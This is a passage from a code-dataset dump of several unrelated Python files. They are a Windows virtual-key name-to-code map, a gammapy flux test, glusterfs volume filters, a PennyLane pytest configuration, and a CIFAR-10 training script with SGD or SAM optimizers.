button\n \"rmb\": 0x02, # VK_RBUTTON Right mouse button\n \"break\": 0x03, # VK_CANCEL Control-break processing\n \"mmb\": 0x04, # VK_MBUTTON Middle mouse button (three-button mouse)\n \"x1mb\": 0x05, # VK_XBUTTON1 X1 mouse button\n \"x2mb\": 0x06, # VK_XBUTTON2 X2 mouse button\n \"x3mb\": 0x07, # - Undefined\n \"back\": 0x08, # VK_BACK BACKSPACE key\n \"backspace\": 0x08, # VK_BACK BACKSPACE key\n \"tab\": 0x09, # VK_TAB TAB key\n # - 0x0A-0B Reserved\n \"clear\": 0x0C, # VK_CLEAR CLEAR key\n \"return\": 0x0D, # VK_RETURN ENTER key\n \"enter\": 0x0D, # VK_RETURN ENTER key\n \"cr\": 0x0D, # VK_RETURN ENTER key\n \"lf\": 0x0D, # VK_RETURN ENTER key\n # - 0x0E-0F Undefined\n\n # These VK keys don't seem to get generated by the global key handler;\n # instead, the more low-level (lcontrol, rcontrol, etc) ones are.\n \"shift\": 0x10, # VK_SHIFT SHIFT key\n \"sft\": 0x10, # VK_SHIFT SHIFT key\n \"control\": 0x11, # VK_CONTROL CTRL key\n \"ctrl\": 0x11, # VK_CONTROL CTRL key\n \"menu\": 0x12, # VK_MENU ALT key\n \"alt\": 0x12, # VK_MENU ALT key\n\n \"pause\": 0x13, # VK_PAUSE PAUSE key\n \"caps-lock\": 0x14, # VK_CAPITAL CAPS LOCK key\n \"kana\": 0x15, # VK_KANA IME Kana mode\n \"hanguel\": 0x15, # VK_HANGUEL IME Hanguel mode (maintained for compatibility; use VK_HANGUL)\n \"hangul\": 0x15, # VK_HANGUL IME Hangul mode\n # - 0x16 Undefined\n \"junja\": 0x17, # VK_JUNJA IME Junja mode\n \"final\": 0x18, # VK_FINAL IME final mode\n \"hanja\": 0x19, # VK_HANJA IME Hanja mode\n \"kanji\": 0x19, # VK_KANJI IME Kanji mode\n # 0x1A - Undefined\n \"escape\": 0x1B, # VK_ESCAPE ESC key\n \"esc\": 0x1B, # VK_ESCAPE ESC key\n \"convert\": 0x1C, # VK_CONVERT IME convert\n \"nonconvert\": 0x1D, # VK_NONCONVERT IME nonconvert\n \"accept\": 0x1E, # VK_ACCEPT IME accept\n \"modechange\": 0x1F, # VK_MODECHANGE IME mode change request\n \"space\": 0x20, # VK_SPACE SPACEBAR\n \"prior\": 0x21, # VK_PRIOR PAGE UP key\n \"pgup\": 0x21, # VK_PRIOR PAGE UP key\n \"pageup\": 0x21, # VK_PRIOR PAGE UP key\n \"next\": 0x22, # VK_NEXT PAGE DOWN key\n \"pgdn\": 0x22, # VK_NEXT PAGE DOWN key\n \"pagedown\": 0x22, # VK_NEXT PAGE DOWN key\n \"end\": 0x23, # VK_END END key\n \"home\": 0x24, # VK_HOME HOME key\n \"left\": 0x25, # VK_LEFT LEFT ARROW key\n \"up\": 0x26, # VK_UP UP ARROW key\n \"right\": 0x27, # VK_RIGHT RIGHT ARROW key\n \"down\": 0x28, # VK_DOWN DOWN ARROW key\n \"select\": 0x29, # VK_SELECT SELECT key\n \"print\": 0x2A, # VK_PRINT PRINT key\n \"execute\": 0x2B, # VK_EXECUTE EXECUTE key\n \"snapshot\": 0x2C, # VK_SNAPSHOT PRINT SCREEN key\n \"insert\": 0x2D, # VK_INSERT INS key\n \"delete\": 0x2E, # VK_DELETE DEL key\n \"del\": 0x2E, # VK_DELETE DEL key\n \"help\": 0x2F, # VK_HELP HELP key\n \"lwin\": 0x5B, # VK_LWIN Left Windows key (Natural keyboard)\n \"rwin\": 0x5C, # VK_RWIN Right Windows key (Natural keyboard)\n \"apps\": 0x5D, # VK_APPS Applications key (Natural keyboard)\n # 0x5E - Reserved\n \"sleep\": 0x5F, # VK_SLEEP Computer Sleep key\n \"numpad0\": 0x60, # VK_NUMPAD0 Numeric keypad 0 key\n \"numpad1\": 0x61, # VK_NUMPAD1 Numeric keypad 1 key\n \"numpad2\": 0x62, # VK_NUMPAD2 Numeric keypad 2 key\n \"numpad3\": 0x63, # VK_NUMPAD3 Numeric keypad 3 key\n \"numpad4\": 0x64, # VK_NUMPAD4 Numeric keypad 4 key\n \"numpad5\": 0x65, # VK_NUMPAD5 Numeric keypad 5 key\n \"numpad6\": 0x66, # VK_NUMPAD6 Numeric keypad 6 key\n \"numpad7\": 0x67, # VK_NUMPAD7 Numeric keypad 7 key\n \"numpad8\": 0x68, # VK_NUMPAD8 Numeric keypad 8 key\n \"numpad9\": 0x69, # VK_NUMPAD9 Numeric keypad 9 key\n \"multiply\": 0x6A, # 
VK_MULTIPLY Multiply key\n \"add\": 0x6B, # VK_ADD Add key\n \"separator\": 0x6C, # VK_SEPARATOR Separator key\n \"subtract\": 0x6D, # VK_SUBTRACT Subtract key\n \"decimal\": 0x6E, # VK_DECIMAL Decimal key\n \"divide\": 0x6F, # VK_DIVIDE Divide key\n \"f1\": 0x70, # VK_F1 F1 key\n \"f2\": 0x71, # VK_F2 F2 key\n \"f3\": 0x72, # VK_F3 F3 key\n \"f4\": 0x73, # VK_F4 F4 key\n \"f5\": 0x74, # VK_F5 F5 key\n \"f6\": 0x75, # VK_F6 F6 key\n \"f7\": 0x76, # VK_F7 F7 key\n \"f8\": 0x77, # VK_F8 F8 key\n \"f9\": 0x78, # VK_F9 F9 key\n \"f10\": 0x79, # VK_F10 F10 key\n \"f11\": 0x7A, # VK_F11 F11 key\n \"f12\": 0x7B, # VK_F12 F12 key\n \"f13\": 0x7C, # VK_F13 F13 key\n \"f14\": 0x7D, # VK_F14 F14 key\n \"f15\": 0x7E, # VK_F15 F15 key\n \"f16\": 0x7F, # VK_F16 F16 key\n \"f17\": 0x80, # VK_F17 F17 key\n \"f18\": 0x81, # VK_F18 F18 key\n \"f19\": 0x82, # VK_F19 F19 key\n \"f20\": 0x83, # VK_F20 F20 key\n \"f21\": 0x84, # VK_F21 F21 key\n \"f22\": 0x85, # VK_F22 F22 key\n \"f23\": 0x86, # VK_F23 F23 key\n \"f24\": 0x87, # VK_F24 F24 key\n # 0x88-8F - Unassigned\n \"numlock\": 0x90, # VK_NUMLOCK NUM LOCK key\n \"scroll\": 0x91, # VK_SCROLL SCROLL LOCK key\n # 0x92-96 - OEM specific\n # 0x97-9F - Unassigned\n \"lshift\": 0xA0, # VK_LSHIFT Left SHIFT key\n \"rshift\": 0xA1, # VK_RSHIFT Right SHIFT key\n \"lcontrol\": 0xA2, # VK_LCONTROL Left CONTROL key\n \"lctrl\": 0xA2, # VK_LCONTROL Left CONTROL key\n \"rcontrol\": 0xA3, # VK_RCONTROL Right CONTROL key\n \"rctrl\": 0xA3, # VK_RCONTROL Right CONTROL key\n \"lmenu\": 0xA4, # VK_LMENU Left MENU key\n \"lalt\": 0xA4, # VK_LMENU Left MENU key\n \"rmenu\": 0xA5, # VK_RMENU Right MENU key\n \"ralt\": 0xA5, # VK_RMENU Right MENU key\n \"browser-back\": 0xA6, # VK_BROWSER_BACK Browser Back key\n \"browser-forward\": 0xA7, # VK_BROWSER_FORWARD Browser Forward key\n \"browser-refresh\": 0xA8, # VK_BROWSER_REFRESH Browser Refresh key\n \"browser-stop\": 0xA9, # VK_BROWSER_STOP Browser Stop key\n \"browser-search\": 0xAA, # VK_BROWSER_SEARCH Browser Search key\n \"browser-favorites\": 0xAB, # VK_BROWSER_FAVORITES Browser Favorites key\n \"browser-home\": 0xAC, # VK_BROWSER_HOME Browser Start and Home key\n \"volume-mute\": 0xAD, # VK_VOLUME_MUTE Volume Mute key\n \"volume-down\": 0xAE, # VK_VOLUME_DOWN Volume Down key\n \"volume-up\": 0xAF, # VK_VOLUME_UP Volume Up key\n \"media-next-track\": 0xB0, # VK_MEDIA_NEXT_TRACK Next Track key\n \"media-prev-track\": 0xB1, # VK_MEDIA_PREV_TRACK Previous Track key\n \"media-stop\": 0xB2, # VK_MEDIA_STOP Stop Media key\n \"media-play-pause\": 0xB3, # VK_MEDIA_PLAY_PAUSE Play/Pause Media key\n \"launch-mail\": 0xB4, # VK_LAUNCH_MAIL Start Mail key\n \"launch-media-select\": 0xB5, # VK_LAUNCH_MEDIA_SELECT Select Media key\n \"launch-app1\": 0xB6, # VK_LAUNCH_APP1 Start Application 1 key\n \"launch-app2\": 0xB7, # VK_LAUNCH_APP2 Start Application 2 key\n # 0xB8-B9 - Reserved\n \"oem_1\": 0xBA, # VK_OEM_1 Used for miscellaneous characters;\n # it can vary by keyboard. For the US standard keyboard, the ';:' key\n \":\": 0xBA,\n \";\": 0xBA,\n \"colon\": 0xBA,\n \"oem_plus\": 0xBB, # VK_OEM_PLUS For any country/region, the '+' key\n \"plus\": 0xBB,\n \"oem_comma\": 0xBC, # VK_OEM_COMMA For any country/region, the ',' key\n \"comma\": 0xBC,\n \",\": 0xBC,\n \"<\": 0xBC,\n \"oem_minus\": 0xBD, # VK_OEM_MINUS For any country/region, the '-' key\n \"minus\": 0xBD,\n \"oem_period\": 0xBE, # VK_OEM_PERIOD For any country/region, the '.' 
key\n \".\": 0xBE,\n \"period\": 0xBE,\n \">\": 0xBE,\n \"oem_2\": 0xBF, # VK_OEM_2 Used for miscellaneous characters;\n # it can vary by keyboard. For the US standard keyboard, the '/?' key\n \"/\": 0xBF,\n \"slash\": 0xBF,\n \"?\": 0xBF,\n \"question\": 0xBF,\n \"question-mark\": 0xBF,\n \"oem2\": 0xBF,\n \"oem_3\": 0xC0, # VK_OEM_3 Used for miscellaneous characters;\n # it can vary by keyboard. For the US standard keyboard, the '`~' key\n \"oem3\": 0xC0,\n \"~\": 0xC0,\n \"tilde\": 0xC0,\n \"twiddle\": 0xC0,\n \"`\": 0xC0,\n \"back-tick\": 0xC0,\n # 0xC1-D7 - Reserved\n # 0xD8-DA - Unassigned\n \"oem_4\": 0xDB, # VK_OEM_4 Used for miscellaneous characters;\n # it can vary by keyboard. For the US standard keyboard, the '[{' key\n \"oem4\": 0xDB,\n \"[\": 0xDB,\n \"{\": 0xDB,\n \"left-bracket\": 0xDB,\n \"oem_5\": 0xDC, # VK_OEM_5 Used for miscellaneous characters;\n # it can vary by keyboard. For the US standard keyboard, the '\\|' key\n \"oem5\": 0xDC,\n \"|\": 0xDC,\n \"\\\\\": 0xDC,\n \"pipe\": 0xDC,\n \"backslash\": 0xDC,\n \"oem_6\": 0xDD, # VK_OEM_6 Used for miscellaneous characters;\n # it can vary by keyboard. For the US standard keyboard, the ']}' key\n \"oem6\": 0xDD,\n \"]\": 0xDD,\n \"}\": 0xDD,\n \"right-bracket\": 0xDD,\n \"oem_7\": 0xDE, # VK_OEM_7 Used for miscellaneous characters;\n # it can vary by keyboard. For the US standard keyboard,\n # the 'single-quote/double-quote' key\n \"oem7\": 0xDE,\n '\"': 0xDE,\n \"'\": 0xDE,\n \"quote\": 0xDE,\n \"tick\": 0xDE,\n \"oem_8\": 0xDF, # VK_OEM_8 Used for miscellaneous characters; it can vary by keyboard.\n \"oem8\": 0xDF,\n # 0xE0 - Reserved\n # 0xE1 - OEM specific\n \"oem_102\": 0xE2, # VK_OEM_102 Either the angle bracket key or the backslash key on\n # the RT 102-key keyboard\n \"oem102\": 0xE2,\n # 0xE3-E4 - OEM specific\n \"processkey\": 0xE5, # VK_PROCESSKEY IME PROCESS key\n # 0xE6 - OEM specific\n \"packet\": 0xE7, # VK_PACKET Used to pass Unicode characters as if they were\n # keystrokes. The VK_PACKET key is the low word of a 32-bit Virtual\n # Key value used for non-keyboard input methods. 
For more\n # information, see Remark in KEYBDINPUT, SendInput, WM_KEYDOWN, and WM_KEYUP\n # 0xE8 - Unassigned\n # 0xE9-F5 - OEM specific\n \"attn\": 0xF6, # VK_ATTN Attn key\n \"crsel\": 0xF7, # VK_CRSEL CrSel key\n \"exsel\": 0xF8, # VK_EXSEL ExSel key\n \"ereof\": 0xF9, # VK_EREOF Erase EOF key\n \"play\": 0xFA, # VK_PLAY Play key\n \"zoom\": 0xFB, # VK_ZOOM Zoom key\n \"noname\": 0xFC, # VK_NONAME Reserved\n \"pa1\": 0xFD, # VK_PA1 PA1 key\n \"oem_clear\": 0xFE, # VK_OEM_CLEAR Clear key\n # 0x3A-40 - Undefined\n \"0\": 0x30, # 0 key\n \"1\": 0x31, # 1 key\n \"2\": 0x32, # 2 key\n \"3\": 0x33, # 3 key\n \"4\": 0x34, # 4 key\n \"5\": 0x35, # 5 key\n \"6\": 0x36, # 6 key\n \"7\": 0x37, # 7 key\n \"8\": 0x38, # 8 key\n \"9\": 0x39, # 9 key\n \"a\": 0x41, # A key\n \"b\": 0x42, # B key\n \"c\": 0x43, # C key\n \"d\": 0x44, # D key\n \"e\": 0x45, # E key\n \"f\": 0x46, # F key\n \"g\": 0x47, # G key\n \"h\": 0x48, # H key\n \"i\": 0x49, # I key\n \"j\": 0x4A, # J key\n \"k\": 0x4B, # K key\n \"l\": 0x4C, # L key\n \"m\": 0x4D, # M key\n \"n\": 0x4E, # N key\n \"o\": 0x4F, # O key\n \"p\": 0x50, # P key\n \"q\": 0x51, # Q key\n \"r\": 0x52, # R key\n \"s\": 0x53, # S key\n \"t\": 0x54, # T key\n \"u\": 0x55, # U key\n \"v\": 0x56, # V key\n \"w\": 0x57, # W key\n \"x\": 0x58, # X key\n \"y\": 0x59, # Y key\n \"z\": 0x5A, # Z key\n}\n\n_MODIFIER_KEYS = set()\nfor __k in MODIFIERS:\n _MODIFIER_KEYS.add(STR_VK_MAP[__k])\n\n_WIN_KEYS = [STR_VK_MAP['lwin'], STR_VK_MAP['rwin']]\n\n\nSPECIAL_MODIFIER_CHECK_VKEY_CODES = (\n STR_VK_MAP['lwin'], STR_VK_MAP['rwin']\n)\n"} {"ext": "py", "sha": "1a3012a0f455705472b60991f832c2726af097fd", "content": "# Licensed under a 3-clause BSD style license - see LICENSE.rst\nimport pytest\nimport astropy.units as u\nfrom ....utils.testing import assert_quantity_allclose, requires_data\nfrom .. 
import PrimaryFlux\n\n\n@requires_data(\"gammapy-data\")\ndef test_primary_flux():\n with pytest.raises(ValueError):\n PrimaryFlux(channel=\"Spam\", mDM=1 * u.TeV)\n\n primflux = PrimaryFlux(channel=\"W\", mDM=1 * u.TeV)\n actual = primflux.table_model(500 * u.GeV)\n desired = 9.328234e-05 / u.GeV\n assert_quantity_allclose(actual, desired)\n"} {"ext": "py", "sha": "1a30130f642b10e1d40939478b8141a9ebcedc60", "content": "# -*- coding: utf-8 -*-\n\"\"\"\n glusterfstools.volumefilters\n\n :copyright: (c) 2013, 2014 by Aravinda VK\n :license: BSD, see LICENSE for more details.\n\"\"\"\n\nfrom functools import wraps\nimport re\n\n_volume_filters = {}\n\n\ndef filter(name):\n def filter_decorator(f):\n @wraps(f)\n def wrapper(*args, **kwds):\n return f(*args, **kwds)\n\n global _volume_filters\n _volume_filters[name] = wrapper\n return wrapper\n return filter_decorator\n\n\n@filter(\"name\")\ndef name_filter(vols, value):\n def is_match(vol, value):\n if value in ['', 'all'] or \\\n vol[\"name\"].lower() == value.lower().strip() or \\\n re.search(value, vol[\"name\"]):\n return True\n else:\n return False\n\n return [v for v in vols if is_match(v, value)]\n\n\n@filter(\"status\")\ndef status_filter(vols, value):\n def is_match(vol, value):\n if value in ['', 'all'] or \\\n vol[\"status\"].lower() == value.lower().strip():\n return True\n else:\n return False\n\n return [v for v in vols if is_match(v, value)]\n\n\n@filter(\"type\")\ndef type_filter(vols, value):\n def is_match(vol, value):\n if value in ['', 'all'] or \\\n vol[\"type\"].lower() == value.lower() or \\\n re.search(value, vol[\"type\"], re.I):\n return True\n else:\n return False\n\n return [v for v in vols if is_match(v, value)]\n\n\n@filter(\"volumewithbrick\")\ndef volumewithbrick_filter(vols, value):\n def is_match(vol, value):\n for brick in vol[\"bricks\"]:\n if value in ['', 'all'] or \\\n brick.lower() == value.lower() or \\\n re.search(value, brick, re.I):\n return True\n\n # If no single brick matching the query\n return False\n\n return [v for v in vols if is_match(v, value)]\n\n\ndef get():\n return _volume_filters\n"} {"ext": "py", "sha": "1a301448b33056fc64fe89f0c4136b91c4fc9fa8", "content": "# Copyright 2018-2020 Xanadu Quantum Technologies Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nPytest configuration file for PennyLane test suite.\n\"\"\"\nimport os\n\nimport pytest\nimport numpy as np\n\nimport pennylane as qml\nfrom pennylane.plugins import DefaultGaussian\n\n# defaults\nTOL = 1e-3\nTF_TOL = 2e-2\n\nclass DummyDevice(DefaultGaussian):\n \"\"\"Dummy device to allow Kerr operations\"\"\"\n _operation_map = DefaultGaussian._operation_map.copy()\n _operation_map['Kerr'] = lambda *x, **y: np.identity(2)\n\n\n@pytest.fixture(scope=\"session\")\ndef tol():\n \"\"\"Numerical tolerance for equality tests.\"\"\"\n return float(os.environ.get(\"TOL\", TOL))\n\n@pytest.fixture(scope=\"session\")\ndef tf_tol():\n \"\"\"Numerical tolerance for equality tests.\"\"\"\n return float(os.environ.get(\"TF_TOL\", 
TF_TOL))\n\n@pytest.fixture(scope=\"session\", params=[1, 2])\ndef n_layers(request):\n \"\"\"Number of layers.\"\"\"\n return request.param\n\n\n@pytest.fixture(scope=\"session\", params=[2, 3])\ndef n_subsystems(request):\n \"\"\"Number of qubits or qumodes.\"\"\"\n return request.param\n\n\n@pytest.fixture(scope=\"session\")\ndef qubit_device(n_subsystems):\n return qml.device('default.qubit', wires=n_subsystems)\n\n\n@pytest.fixture(scope=\"function\")\ndef qubit_device_1_wire():\n return qml.device('default.qubit', wires=1)\n\n\n@pytest.fixture(scope=\"function\")\ndef qubit_device_2_wires():\n return qml.device('default.qubit', wires=2)\n\n\n@pytest.fixture(scope=\"function\")\ndef qubit_device_3_wires():\n return qml.device('default.qubit', wires=3)\n\n\n@pytest.fixture(scope=\"session\")\ndef tensornet_device(n_subsystems):\n return qml.device('default.tensor', wires=n_subsystems)\n\n\n@pytest.fixture(scope=\"function\")\ndef tensornet_device_1_wire():\n return qml.device('default.tensor', wires=1)\n\n\n@pytest.fixture(scope=\"function\")\ndef tensornet_device_2_wires():\n return qml.device('default.tensor', wires=2)\n\n\n@pytest.fixture(scope=\"function\")\ndef tensornet_device_3_wires():\n return qml.device('default.tensor', wires=3)\n\n\n@pytest.fixture(scope=\"session\")\ndef gaussian_device(n_subsystems):\n \"\"\"Number of qubits or modes.\"\"\"\n return DummyDevice(wires=n_subsystems)\n\n@pytest.fixture(scope=\"session\")\ndef gaussian_dummy():\n \"\"\"Number of qubits or modes.\"\"\"\n return DummyDevice\n\n@pytest.fixture(scope=\"session\")\ndef gaussian_device_2_wires():\n \"\"\"A 2-mode Gaussian device.\"\"\"\n return DummyDevice(wires=2)\n\n\n@pytest.fixture(scope=\"session\")\ndef gaussian_device_4modes():\n \"\"\"A 4 mode Gaussian device.\"\"\"\n return DummyDevice(wires=4)\n\n\n@pytest.fixture(scope='session')\ndef torch_support():\n \"\"\"Boolean fixture for PyTorch support\"\"\"\n try:\n import torch\n from torch.autograd import Variable\n torch_support = True\n except ImportError as e:\n torch_support = False\n\n return torch_support\n\n\n@pytest.fixture()\ndef skip_if_no_torch_support(torch_support):\n if not torch_support:\n pytest.skip(\"Skipped, no torch support\")\n\n\n@pytest.fixture(scope='module')\ndef tf_support():\n \"\"\"Boolean fixture for TensorFlow support\"\"\"\n try:\n import tensorflow as tf\n tf_support = True\n\n except ImportError as e:\n tf_support = False\n\n return tf_support\n\n\n@pytest.fixture()\ndef skip_if_no_tf_support(tf_support):\n if not tf_support:\n pytest.skip(\"Skipped, no tf support\")\n\n\n@pytest.fixture(scope=\"module\",\n params=[1, 2, 3])\ndef seed(request):\n \"\"\"Different seeds.\"\"\"\n return request.param\n\n\n@pytest.fixture(scope=\"function\")\ndef mock_device(monkeypatch):\n \"\"\"A mock instance of the abstract Device class\"\"\"\n\n with monkeypatch.context() as m:\n dev = qml.Device\n m.setattr(dev, '__abstractmethods__', frozenset())\n m.setattr(dev, 'short_name', 'mock_device')\n m.setattr(dev, 'capabilities', lambda cls: {\"model\": \"qubit\"})\n yield qml.Device(wires=2)\n\n@pytest.fixture\ndef tear_down_hermitian():\n yield None\n qml.Hermitian._eigs = {}\n\n"} {"ext": "py", "sha": "1a30151df25ee8d440dce68656b0ceb7eb16edb0", "content": "from data.cifar import Cifar\nfrom utility.step_lr import StepLR\nfrom utility.initialize import initialize\nfrom utility.log import Log\nfrom utility.lognolr import LogNoLR\nfrom model import *\nimport time\nfrom model.preact_resnet import *\nfrom model.smooth_cross_entropy 
import smooth_crossentropy\nfrom model.wideresnet import WideResNet\nfrom model.resnet import *\nfrom model.vgg import *\nfrom sam import SAM\nimport argparse\nimport torch\nimport sys\nimport os\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils.data import DataLoader\nfrom torch.optim.lr_scheduler import CosineAnnealingLR, CosineAnnealingWarmRestarts\nfrom utility.cosine_annealing_with_warmup_lr import CosineAnnealingWarmUpRestarts\nimport tensorboard\nfrom utils import progress_bar\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--adaptive\", default=True, type=bool,\n help=\"True if you want to use the Adaptive SAM.\")\n parser.add_argument(\"--batch_size\", default=128, type=int,\n help=\"Batch size used in the training and validation loop.\")\n parser.add_argument(\"--depth\", default=16, type=int,\n help=\"Number of layers.\")\n parser.add_argument(\"--dropout\", default=0.0,\n type=float, help=\"Dropout rate.\")\n parser.add_argument(\"--epochs\", default=150, type=int,\n help=\"Total number of epochs.\")\n parser.add_argument(\"--label_smoothing\", default=0.1,\n type=float, help=\"Use 0.0 for no label smoothing.\")\n parser.add_argument(\"--learning_rate\", default=0.1, type=float,\n help=\"Base learning rate at the start of the training.\")\n parser.add_argument(\"--momentum\", default=0.9,\n type=float, help=\"SGD Momentum.\")\n parser.add_argument(\"--threads\", default=2, type=int,\n help=\"Number of CPU threads for dataloaders.\")\n parser.add_argument(\"--rho\", default=0.5, type=int,\n help=\"Rho parameter for SAM.\")\n parser.add_argument(\"--weight_decay\", default=0.0005,\n type=float, help=\"L2 weight decay.\")\n parser.add_argument(\"--width_factor\", default=8, type=int,\n help=\"In case WideResNet, how many times wider compared to normal ResNet.\")\n parser.add_argument(\"--SAM\", default=False, type=bool,\n help=\"Use SAM optimizer or SGD.\")\n parser.add_argument('--resume', '-r', action='store_true',\n help='resume from checkpoint')\n args = parser.parse_args()\n\n initialize(args, seed=42)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # Data\n print('==> Preparing data..')\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465),\n (0.2023, 0.1994, 0.2010)),\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465),\n (0.2023, 0.1994, 0.2010)),\n ])\n\n trainset = torchvision.datasets.CIFAR10(\n root='./data', train=True, download=True, transform=transform_train)\n trainloader = torch.utils.data.DataLoader(\n trainset, batch_size=128, shuffle=True, num_workers=2)\n\n testset = torchvision.datasets.CIFAR10(\n root='./data', train=False, download=True, transform=transform_test)\n testloader = torch.utils.data.DataLoader(\n testset, batch_size=100, shuffle=False, num_workers=2)\n\n classes = ('plane', 'car', 'bird', 'cat', 'deer',\n 'dog', 'frog', 'horse', 'ship', 'truck')\n\n # dataset = Cifar(args.batch_size, args.threads)\n\n # Logger\n # log = Log(log_each=10)\n log = LogNoLR(log_each=10)\n\n # which model to use (VGG, Preactivation ResNet,)\n # model = WideResNet(args.depth, 10, args.width_factor,\n # dropRate=args.dropout).to(device)\n model = VGG16().to(device)\n if device == 'cuda':\n model = 
torch.nn.DataParallel(model)\n best_acc = 0 # best test accuracy\n start_epoch = 0 # start from epoch 0 or last checkpoint epoch\n\n hermite_bias_list = []\n hermite_weight_list = []\n for name, param in model.named_parameters():\n if 'bias' in name:\n hermite_bias_list.append(name)\n if 'wts' in name:\n hermite_weight_list.append(name)\n\n hermite_list = hermite_bias_list + hermite_weight_list\n params1 = list(map(lambda x: x[1], list(\n filter(lambda kv: kv[0] in hermite_bias_list, model.named_parameters()))))\n params2 = list(map(lambda x: x[1], list(\n filter(lambda kv: kv[0] in hermite_weight_list, model.named_parameters()))))\n # params3 = list(map(lambda x: x[1], list(\n # filter(lambda kv: kv[0] in hermite_weight2_list, model.named_parameters()))))\n # params3 = list(map(lambda x: x[1], list(\n # filter(lambda kv: kv[0] in w3, model.named_parameters()))))\n # params4 = list(map(lambda x: x[1], list(\n # filter(lambda kv: kv[0] in w4, model.named_parameters()))))\n base_params = list(map(lambda x: x[1], list(\n filter(lambda kv: kv[0] not in hermite_list, model.named_parameters()))))\n\n if args.resume:\n # Load checkpoint.\n print('==> Resuming from checkpoint..')\n assert os.path.isdir(\n 'checkpoint'), 'Error: no checkpoint directory found!'\n checkpoint = torch.load('./checkpoint/ckpt.pth')\n model.load_state_dict(checkpoint['net'])\n best_acc = checkpoint['acc']\n start_epoch = checkpoint['epoch']\n\n # Optimizer (SGD or SAM): SAM shows slightly better accuracy compared to SGD\n if args.SAM is True:\n base_optimizer = torch.optim.SGD\n optimizer = SAM(\n [{'params': base_params},\n {'params': params1, 'weight_decay': 0, 'lr': args.learning_rate},\n {'params': params2, 'weight_decay': args.weight_decay /\n 2, 'lr': args.learning_rate},\n # {'params': params3, 'weight_decay': args.weight_decay /\n # 2, 'lr': args.learning_rate},\n # {'params': params4, 'weight_decay': args.weight_decay /\n # 2, 'lr': args.learning_rate}\n ],\n base_optimizer, rho=args.rho, adaptive=args.adaptive, lr=args.learning_rate, momentum=args.momentum, weight_decay=args.weight_decay)\n\n else:\n optimizer = torch.optim.SGD(\n [{'params': base_params},\n {'params': params1, 'weight_decay': args.weight_decay /\n 2, 'lr': args.learning_rate},\n {'params': params2, 'weight_decay': args.weight_decay /\n 2, 'lr': args.learning_rate},\n # {'params': params3, 'weight_decay': args.weight_decay /\n # 2, 'lr': args.learning_rate},\n # {'params': params4, 'weight_decay': args.weight_decay/2, 'lr': args.learning_rate}\n ],\n lr=args.learning_rate, momentum=args.momentum, weight_decay=args.weight_decay)\n\n scheduler = StepLR(optimizer, args.learning_rate, args.epochs)\n print(args.epochs, \" epochs\")\n if args.SAM is True:\n print(\"SAM optimizer\")\n else:\n print(\"SGD optimizer\")\n # print(list(model.parameters()))\n\n def train(epoch):\n print('\\nEpoch: %d' % epoch)\n model.train()\n train_loss = 0\n correct = 0\n total = 0\n for batch_idx, (inputs, targets) in enumerate(trainloader):\n inputs, targets = inputs.to(device), targets.to(device)\n if args.SAM is False:\n optimizer.zero_grad()\n outputs = model(inputs)\n loss = smooth_crossentropy(outputs, targets)\n loss.mean().backward()\n if args.SAM is True:\n optimizer.first_step(zero_grad=True)\n smooth_crossentropy(model(inputs), targets).mean().backward()\n optimizer.second_step(zero_grad=True)\n else:\n optimizer.step()\n\n train_loss += loss.mean().item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += 
predicted.eq(targets).sum().item()\n\n progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'\n % (train_loss/(batch_idx+1), 100.*correct/total, correct, total))\n\n def test(epoch):\n global best_acc\n model.eval()\n test_loss = 0\n correct = 0\n total = 0\n with torch.no_grad():\n for batch_idx, (inputs, targets) in enumerate(testloader):\n inputs, targets = inputs.to(device), targets.to(device)\n outputs = model(inputs)\n loss = smooth_crossentropy(outputs, targets)\n\n test_loss += loss.mean().item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n\n progress_bar(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'\n % (test_loss/(batch_idx+1), 100.*correct/total, correct, total))\n\n acc = 100.*correct/total\n if acc > best_acc:\n best_acc = acc\n # Save checkpoint.\n print('Saving checkpoint..')\n state = {\n 'net': model.state_dict(),\n 'acc': acc,\n 'epoch': epoch,\n }\n if not os.path.isdir('checkpoint'):\n os.mkdir('checkpoint')\n torch.save(state, './checkpoint/ckpt.pth')\n\n # # Save torchscript\n with torch.no_grad():\n print('Saving Torch Script..')\n if not os.path.isdir('torchscript'):\n os.mkdir('torchscript')\n example = torch.rand(1, 3, 32, 32).to(device)\n traced_script_module = torch.jit.trace(model, example)\n traced_script_module.save(\"./torchscript/model.pt\")\n\n\nfor epoch in range(start_epoch, start_epoch+200):\n train(epoch)\n test(epoch)\n scheduler(epoch)\n\n##############################################################################################\n##############################################################################################\n##############################################################################################\n##############################################################################################\n##############################################################################################\n##############################################################################################\n##############################################################################################\n##############################################################################################\n##############################################################################################\n##############################################################################################\n # for epoch in range(args.epochs):\n # model.train()\n # log.train(len_dataset=len(dataset.train))\n\n # for batch in dataset.train:\n # inputs, targets = (b.to(device) for b in batch)\n\n # if args.SAM is False:\n # optimizer.zero_grad()\n # predictions = model(inputs)\n # loss = smooth_crossentropy(predictions, targets)\n # loss.mean().backward()\n # if args.SAM is True:\n # optimizer.first_step(zero_grad=True)\n # smooth_crossentropy(model(inputs), targets).mean().backward()\n # optimizer.second_step(zero_grad=True)\n # else:\n # optimizer.step()\n\n # with torch.no_grad():\n # correct = torch.argmax(predictions.data, 1) == targets\n # # log(model, loss.cpu(), correct.cpu(), scheduler.lr())\n # # check which log function to use at line 61\n # log(model, loss.cpu(), 